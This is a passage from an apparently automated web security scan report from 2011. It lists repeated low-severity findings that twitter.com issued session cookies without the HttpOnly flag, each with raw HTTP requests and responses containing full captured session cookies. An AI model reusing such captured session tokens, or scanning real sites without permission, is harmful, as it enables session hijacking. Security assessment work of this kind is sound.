Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:25:37 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224737-3926-21803
X-RateLimit-Limit: 150
ETag: "708dea7c27c89c56a852101cec365315"
Last-Modified: Fri, 28 Jan 2011 14:25:37 GMT
X-RateLimit-Remaining: 144
X-Runtime: 0.06567
X-Transaction-Mask: 0b5b266a28469a7b52ded76c9a66f018
Content-Type: application/rss+xml; charset=utf-8
Content-Length: 13545
Pragma: no-cache
X-RateLimit-Class: api
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-RateLimit-Reset: 1296227305
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<rss xmlns:atom="http://www.w3.org/2005/Atom" version="2.0" xmlns:georss="http://www.georss.org/georss" xmlns:twitter="http://api.twitter.com">
<channel>
<
...[SNIP]...

11.96. http://twitter.com/favorites/toptweets.json previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/favorites/toptweets.json

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favorites/toptweets.json?callback=TWTR.Widget.receiveCallback_1&include_rts=true&clientsource=TWITTERINC_WIDGET&1296232504372=cachebust HTTP/1.1
Host: twitter.com
Proxy-Connection: keep-alive
Referer: http://twitter.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=129452629042599503; original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; tz_offset_sec=-21600; __utmz=43838368.1296223511.1.1.utmcsr=malsup.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=43838368.1078689092.1296223511.1296223511.1296223511.1; __utmc=43838368; __utmv=43838368.lang%3A%20en; k=173.193.214.243.1296227675375304; _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCDNO8MwtAToHaWQiJTFjOTUzNDgxYTQyZmRl%250AOWMwYzc0YWVkNTc5MWYyZjY0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--a8f223ad45d09367559f519bdad491ac222063d2

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 16:35:18 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296232518-14489-49043
X-RateLimit-Limit: 150
ETag: "a73f7cf89a5f9d35a2a745da5eeb4d24"-gzip
Last-Modified: Fri, 28 Jan 2011 16:35:18 GMT
X-RateLimit-Remaining: 150
X-Runtime: 0.07886
X-Transaction-Mask: 0b5b266a28469a7b52ded76c9a66f018
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-RateLimit-Reset: 1296236118
Set-Cookie: _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; domain=.twitter.com; path=/
Vary: Accept-Encoding
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Length: 33965

TWTR.Widget.receiveCallback_1([{"favorited":false,"text":"Check out Smackdown tonight. Edge and I team up for the first time in 4 yrs to give a much deserved beating to Miz and Ziggler","place":null,"
...[SNIP]...

11.97. http://twitter.com/gercheq previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/gercheq

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gercheq HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

11.98. http://twitter.com/greenRAYn20 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/greenRAYn20

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /greenRAYn20 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:53:56 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296266036-99102-50087
ETag: "633d1248acbb92f412629e8aa3e8a93b"
Last-Modified: Sat, 29 Jan 2011 01:53:56 GMT
X-Runtime: 0.01198
Content-Type: text/html; charset=utf-8
Content-Length: 9230
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...

11.99. http://twitter.com/harvardlampoon previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/harvardlampoon

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /harvardlampoon HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

11.100. http://twitter.com/j_hollender previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/j_hollender

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCDNO8MwtAToHaWQiJTFjOTUzNDgxYTQyZmRl%250AOWMwYzc0YWVkNTc5MWYyZjY0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--a8f223ad45d09367559f519bdad491ac222063d2; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /j_hollender HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

11.101. http://twitter.com/j_hollender/status/28168027493105664 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/j_hollender/status/28168027493105664

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CjoOcmV0dXJuX3RvIjxodHRwOi8vdHdpdHRlci5jb20val9ob2xsZW5k%250AZXIvc3RhdHVzLzI4MTY4MDI3NDkzMTA1NjY0Ogxjc3JmX2lkIiU5OTJjOGJk%250AOGYzZTA0NDA4Y2Q1Y2MwMTkzZTZhMTliZjoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAToHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0IgpmbGFz%250AaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpA%250AdXNlZHsA--3734fcc51205696679bb42e413a9322e748617b9; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.102. http://twitter.com/j_hollender/status/28175738595180544 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/j_hollender/status/28175738595180544

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CjoOcmV0dXJuX3RvIjxodHRwOi8vdHdpdHRlci5jb20val9ob2xsZW5k%250AZXIvc3RhdHVzLzI4MTc1NzM4NTk1MTgwNTQ0Ogxjc3JmX2lkIiU2ZGExNWUw%250AMGMyZWNjNjJjMzIzODFhMjU5NmZkNTkzZjoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAToHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0IgpmbGFz%250AaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpA%250AdXNlZHsA--49158f0023a784432eb325042f2a8c5b699ba833; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /j_hollender/status/28175738595180544 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

11.103. http://twitter.com/j_hollender/status/28205461161377793 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/j_hollender/status/28205461161377793

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CjoOcmV0dXJuX3RvIjxodHRwOi8vdHdpdHRlci5jb20val9ob2xsZW5k%250AZXIvc3RhdHVzLzI4MjA1NDYxMTYxMzc3NzkzOgxjc3JmX2lkIiUyZmUyZWVl%250AMjgwOTk4NGY3OWE1Y2JiZTJlZjVkMWFmNzoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAToHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0IgpmbGFz%250AaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpA%250AdXNlZHsA--8142c62a123829501cbddbd07b967c4cb31b12ef; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /j_hollender/status/28205461161377793 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

11.104. http://twitter.com/jayleno previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/jayleno

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /jayleno HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

11.105. http://twitter.com/jbchang previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/jbchang

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /jbchang HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

11.106. http://twitter.com/jobs previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/jobs

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CToMY3NyZl9pZCIlZDAwNDA4YmY4ZmE2OWEzNWU4MmQ0MDg5OTkxYmEz%250AMTU6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--b979158e747a489fb5b4a97a6e15537893f77f1a; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /jobs HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

11.107. http://twitter.com/joedwinell/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/joedwinell/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /joedwinell/ HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

11.108. http://twitter.com/joemccann previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/joemccann

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /joemccann HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

11.109. http://twitter.com/jordanknight previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/jordanknight

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

